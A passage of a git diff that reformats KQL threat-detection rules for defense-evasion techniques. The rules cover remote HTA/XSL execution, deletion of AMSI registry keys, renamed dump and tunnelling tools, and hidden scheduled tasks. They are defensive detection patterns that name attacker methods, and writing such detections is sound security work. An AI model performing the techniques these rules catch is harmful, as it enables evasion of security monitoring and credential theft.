Author: Swachchhanda Shrawan Poudel +// Date: 2023-11-09 +// Level: high +// Description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1220 +// False Positives: +// - Msxsl is not installed by default and is deprecated, so unlikely on most systems. + +DeviceProcessEvents | where ProcessCommandLine contains "http" and FolderPath endswith "\\msxsl.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql b/KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql index dfee6a59..98fe8929 100644 --- a/KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql +++ b/KQL/rules/Defense Evasion/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql @@ -1,10 +1,10 @@ -// Title: RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses -// Author: frack113 -// Date: 2021-07-13 -// Level: high -// Description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses +// Author: frack113 +// Date: 2021-07-13 +// Level: high +// Description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisablementCommand" or ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisableme" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql b/KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql index e0719599..9537c7d5 100644 --- a/KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql +++ b/KQL/rules/Defense Evasion/remotely_hosted_hta_file_executed_via_mshta_exe.kql @@ -1,10 +1,10 @@ -// Title: Remotely Hosted HTA File Executed Via Mshta.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-08 -// Level: high -// Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218.005 - -DeviceProcessEvents +// Title: Remotely Hosted HTA File Executed Via Mshta.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-08 +// Level: high +// Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218.005 + +DeviceProcessEvents | where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql b/KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql index ee4a4e4b..ef8733f2 100644 --- a/KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql +++ b/KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql @@ -1,12 +1,12 @@ -// Title: Removal Of AMSI Provider Registry Keys -// Author: frack113 -// Date: 2021-06-07 -// Level: high -// Description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Removal Of AMSI Provider Registry Keys +// Author: frack113 +// Date: 2021-06-07 +// Level: high +// Description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where (RegistryKey endswith "{2781761E-28E0-4109-99FE-B9D127C57AFE}" or RegistryKey endswith "{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}") and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql b/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql index 280e5b30..41f0ea4a 100644 --- a/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql +++ b/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql @@ -1,10 +1,10 @@ -// Title: Removal Of Index Value to Hide Schedule Task - Registry -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-26 -// Level: medium -// Description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562 - -DeviceRegistryEvents +// Title: Removal Of Index Value to Hide Schedule Task - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-26 +// Level: medium +// Description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 + +DeviceRegistryEvents | where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Index") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql b/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql index cdb6d9ad..de6ae2a0 100644 --- a/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql +++ b/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql @@ -1,10 +1,10 @@ -// Title: Removal Of SD Value to Hide Schedule Task - Registry -// Author: Sittikorn S -// Date: 2022-04-15 -// Level: medium -// Description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562 - -DeviceRegistryEvents +// Title: Removal Of SD Value to Hide Schedule Task - Registry +// Author: Sittikorn S +// Date: 2022-04-15 +// Level: medium +// Description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 + +DeviceRegistryEvents | where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "SD") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql b/KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql index 491b558b..a7be8874 100644 --- a/KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql +++ b/KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql @@ -1,12 +1,12 @@ -// Title: Remove Immutable File Attribute -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-15 -// Level: medium -// Description: Detects usage of the 'chattr' utility to remove immutable file attribute. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1222.002 -// False Positives: -// - Administrator interacting with immutable files (e.g. for instance backups). - -DeviceProcessEvents +// Title: Remove Immutable File Attribute +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-15 +// Level: medium +// Description: Detects usage of the 'chattr' utility to remove immutable file attribute. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1222.002 +// False Positives: +// - Administrator interacting with immutable files (e.g. for instance backups). + +DeviceProcessEvents | where ProcessCommandLine contains " -i " and FolderPath endswith "/chattr" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql b/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql index fd65b999..a6ff966a 100644 --- a/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql +++ b/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql @@ -1,11 +1,11 @@ -// Title: Remove Scheduled Cron Task/Job -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-15 -// Level: medium -// Description: Detects usage of the 'crontab' utility to remove the current crontab. -// This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Remove Scheduled Cron Task/Job +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-15 +// Level: medium +// Description: Detects usage of the 'crontab' utility to remove the current crontab. +// This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where ProcessCommandLine contains " -r" and FolderPath endswith "crontab" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql b/KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql index 31f52e5c..be62ef8f 100644 --- a/KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql +++ b/KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed AutoHotkey.EXE Execution -// Author: Nasreddine Bencherchali -// Date: 2023-02-07 -// Level: medium -// Description: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Renamed AutoHotkey.EXE Execution +// Author: Nasreddine Bencherchali +// Date: 2023-02-07 +// Level: medium +// Description: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where (ProcessVersionInfoProductName contains "AutoHotkey" or ProcessVersionInfoFileDescription contains "AutoHotkey" or (ProcessVersionInfoOriginalFileName in~ ("AutoHotkey.exe", "AutoHotkey.rc"))) and (not(((FolderPath endswith "\\AutoHotkey.exe" or FolderPath endswith "\\AutoHotkey32.exe" or FolderPath endswith "\\AutoHotkey32_UIA.exe" or FolderPath endswith "\\AutoHotkey64.exe" or FolderPath endswith "\\AutoHotkey64_UIA.exe" or FolderPath endswith "\\AutoHotkeyA32.exe" or FolderPath endswith "\\AutoHotkeyA32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU32.exe" or FolderPath endswith "\\AutoHotkeyU32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU64.exe" or FolderPath endswith "\\AutoHotkeyU64_UIA.exe") or FolderPath contains "\\AutoHotkey"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql b/KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql index 912b2b4c..0901b0db 100644 --- a/KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql +++ b/KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed BOINC Client Execution -// Author: Matt Anderson (Huntress) -// Date: 2024-07-23 -// Level: medium -// Description: Detects the execution of a renamed BOINC binary. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1553 - -DeviceProcessEvents +// Title: Renamed BOINC Client Execution +// Author: Matt Anderson (Huntress) +// Date: 2024-07-23 +// Level: medium +// Description: Detects the execution of a renamed BOINC binary. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553 + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "BOINC.exe" and (not(FolderPath endswith "\\BOINC.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql b/KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql index 60a038c9..438f1514 100644 --- a/KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql +++ b/KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql @@ -1,12 +1,12 @@ -// Title: Renamed CreateDump Utility Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-09-20 -// Level: high -// Description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access -// False Positives: -// - Command lines that use the same flags - -DeviceProcessEvents +// Title: Renamed CreateDump Utility Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-09-20 +// Level: high +// Description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access +// False Positives: +// - Command lines that use the same flags + +DeviceProcessEvents | where (((ProcessCommandLine contains " -u " and ProcessCommandLine contains " -f " and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains " --full " and ProcessCommandLine contains " --name " and ProcessCommandLine contains ".dmp")) or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR") and (not(FolderPath endswith "\\createdump.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql b/KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql index c53a40fd..44a49312 100644 --- a/KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql +++ b/KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql @@ -1,12 +1,12 @@ -// Title: Renamed Mavinject.EXE Execution -// Author: frack113, Florian Roth -// Date: 2022-12-05 -// Level: high -// Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055.001, attack.t1218.013 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Renamed Mavinject.EXE Execution +// Author: frack113, Florian Roth +// Date: 2022-12-05 +// Level: high +// Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055.001, attack.t1218.013 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessVersionInfoOriginalFileName in~ ("mavinject32.exe", "mavinject64.exe")) and (not((FolderPath endswith "\\mavinject32.exe" or FolderPath endswith "\\mavinject64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_megasync_execution.kql b/KQL/rules/Defense Evasion/renamed_megasync_execution.kql index c9a77b0e..0cc57952 100644 --- a/KQL/rules/Defense Evasion/renamed_megasync_execution.kql +++ b/KQL/rules/Defense Evasion/renamed_megasync_execution.kql @@ -1,13 +1,13 @@ -// Title: Renamed MegaSync Execution -// Author: Sittikorn S -// Date: 2021-06-22 -// Level: high -// Description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Software that illegally integrates MegaSync in a renamed form -// - Administrators that have renamed MegaSync - -DeviceProcessEvents +// Title: Renamed MegaSync Execution +// Author: Sittikorn S +// Date: 2021-06-22 +// Level: high +// Description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Software that illegally integrates MegaSync in a renamed form +// - Administrators that have renamed MegaSync + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "megasync.exe" and (not(FolderPath endswith "\\megasync.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql b/KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql index 9101be24..61cc55fb 100644 --- a/KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql +++ b/KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed Microsoft Teams Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-07-12 -// Level: medium -// Description: Detects the execution of a renamed Microsoft Teams binary. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Renamed Microsoft Teams Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-12 +// Level: medium +// Description: Detects the execution of a renamed Microsoft Teams binary. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where (ProcessVersionInfoOriginalFileName in~ ("msteams.exe", "teams.exe")) and (not((FolderPath endswith "\\msteams.exe" or FolderPath endswith "\\teams.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql b/KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql index 70447fb1..d632c721 100644 --- a/KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql +++ b/KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql @@ -1,12 +1,12 @@ -// Title: Renamed Msdt.EXE Execution -// Author: pH-T (Nextron Systems) -// Date: 2022-06-03 -// Level: high -// Description: Detects the execution of a renamed "Msdt.exe" binary -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.003 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Renamed Msdt.EXE Execution +// Author: pH-T (Nextron Systems) +// Date: 2022-06-03 +// Level: high +// Description: Detects the execution of a renamed "Msdt.exe" binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "msdt.exe" and (not(FolderPath endswith "\\msdt.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_office_binary_execution.kql b/KQL/rules/Defense Evasion/renamed_office_binary_execution.kql index 154c5e14..97294b8a 100644 --- a/KQL/rules/Defense Evasion/renamed_office_binary_execution.kql +++ b/KQL/rules/Defense Evasion/renamed_office_binary_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed Office Binary Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-20 -// Level: high -// Description: Detects the execution of a renamed office binary -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Renamed Office Binary Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-20 +// Level: high +// Description: Detects the execution of a renamed office binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where ((ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "MSACCESS.EXE", "MSPUB.EXE", "OneNote.exe", "OneNoteM.exe", "OUTLOOK.EXE", "POWERPNT.EXE", "WinWord.exe")) or (ProcessVersionInfoFileDescription in~ ("Microsoft Access", "Microsoft Excel", "Microsoft OneNote", "Microsoft Outlook", "Microsoft PowerPoint", "Microsoft Publisher", "Microsoft Word", "Sent to OneNote Tool"))) and (not((FolderPath endswith "\\EXCEL.exe" or FolderPath endswith "\\excelcnv.exe" or FolderPath endswith "\\MSACCESS.exe" or FolderPath endswith "\\MSPUB.EXE" or FolderPath endswith "\\ONENOTE.EXE" or FolderPath endswith "\\ONENOTEM.EXE" or FolderPath endswith "\\OUTLOOK.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_plink_execution.kql b/KQL/rules/Defense Evasion/renamed_plink_execution.kql index 9e8efea5..e60c660b 100644 --- a/KQL/rules/Defense Evasion/renamed_plink_execution.kql +++ b/KQL/rules/Defense Evasion/renamed_plink_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed Plink Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-06 -// Level: high -// Description: Detects the execution of a renamed version of the Plink binary -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 - -DeviceProcessEvents +// Title: Renamed Plink Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-06 +// Level: high +// Description: Detects the execution of a renamed version of the Plink binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents | where (ProcessVersionInfoOriginalFileName =~ "Plink" or (ProcessCommandLine contains " -l forward" and ProcessCommandLine contains " -P " and ProcessCommandLine contains " -R ")) and (not(FolderPath endswith "\\plink.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_procdump_execution.kql b/KQL/rules/Defense Evasion/renamed_procdump_execution.kql index d15ceab3..9bdba836 100644 --- a/KQL/rules/Defense Evasion/renamed_procdump_execution.kql +++ b/KQL/rules/Defense Evasion/renamed_procdump_execution.kql @@ -1,14 +1,14 @@ -// Title: Renamed ProcDump Execution -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-11-18 -// Level: high -// Description: Detects the execution of a renamed ProcDump executable. -// This often done by attackers or malware in order to evade defensive mechanisms. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.003 -// False Positives: -// - Procdump illegally bundled with legitimate software. -// - Administrators who rename binaries (should be investigated). - -DeviceProcessEvents +// Title: Renamed ProcDump Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-11-18 +// Level: high +// Description: Detects the execution of a renamed ProcDump executable. +// This often done by attackers or malware in order to evade defensive mechanisms. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 +// False Positives: +// - Procdump illegally bundled with legitimate software. +// - Administrators who rename binaries (should be investigated). + +DeviceProcessEvents | where (ProcessVersionInfoOriginalFileName =~ "procdump" or ((ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma " or ProcessCommandLine contains " –ma " or ProcessCommandLine contains " —ma " or ProcessCommandLine contains " ―ma " or ProcessCommandLine contains " -mp " or ProcessCommandLine contains " /mp " or ProcessCommandLine contains " –mp " or ProcessCommandLine contains " —mp " or ProcessCommandLine contains " ―mp ") and (ProcessCommandLine contains " -accepteula" or ProcessCommandLine contains " /accepteula" or ProcessCommandLine contains " –accepteula" or ProcessCommandLine contains " —accepteula" or ProcessCommandLine contains " ―accepteula"))) and (not((FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql b/KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql index 0fc7e3ce..759fc8db 100644 --- a/KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql +++ b/KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed Remote Utilities RAT (RURAT) Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-19 -// Level: medium -// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.collection, attack.command-and-control, attack.discovery, attack.s0592 - -DeviceProcessEvents +// Title: Renamed Remote Utilities RAT (RURAT) Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-19 +// Level: medium +// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.collection, attack.command-and-control, attack.discovery, attack.s0592 + +DeviceProcessEvents | where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql index 83e9adf3..a4943872 100644 --- a/KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql +++ b/KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql @@ -1,12 +1,12 @@ -// Title: Response File Execution Via Odbcconf.EXE -// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-22 -// Level: medium -// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.008 -// False Positives: -// - The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary. - -DeviceProcessEvents +// Title: Response File Execution Via Odbcconf.EXE +// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-22 +// Level: medium +// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary. + +DeviceProcessEvents | where (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") and ProcessCommandLine contains ".rsp" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql b/KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql index 6fae094c..97921781 100644 --- a/KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql +++ b/KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql @@ -1,12 +1,12 @@ -// Title: Root Certificate Installed From Susp Locations -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-09 -// Level: high -// Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1553.004 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Root Certificate Installed From Susp Locations +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: high +// Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.004 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains ":\\Windows\\TEMP\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\") and (ProcessCommandLine contains "Import-Certificate" and ProcessCommandLine contains " -FilePath " and ProcessCommandLine contains "Cert:\\LocalMachine\\Root") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql b/KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql index 12d6b11e..899fd381 100644 --- a/KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql +++ b/KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql @@ -1,10 +1,10 @@ -// Title: Run PowerShell Script from ADS -// Author: Sergey Soldatov, Kaspersky Lab, oscd.community -// Date: 2019-10-30 -// Level: high -// Description: Detects PowerShell script execution from Alternate Data Stream (ADS) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.004 - -DeviceProcessEvents +// Title: Run PowerShell Script from ADS +// Author: Sergey Soldatov, Kaspersky Lab, oscd.community +// Date: 2019-10-30 +// Level: high +// Description: Detects PowerShell script execution from Alternate Data Stream (ADS) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 + +DeviceProcessEvents | where (ProcessCommandLine contains "Get-Content" and ProcessCommandLine contains "-Stream") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Defense 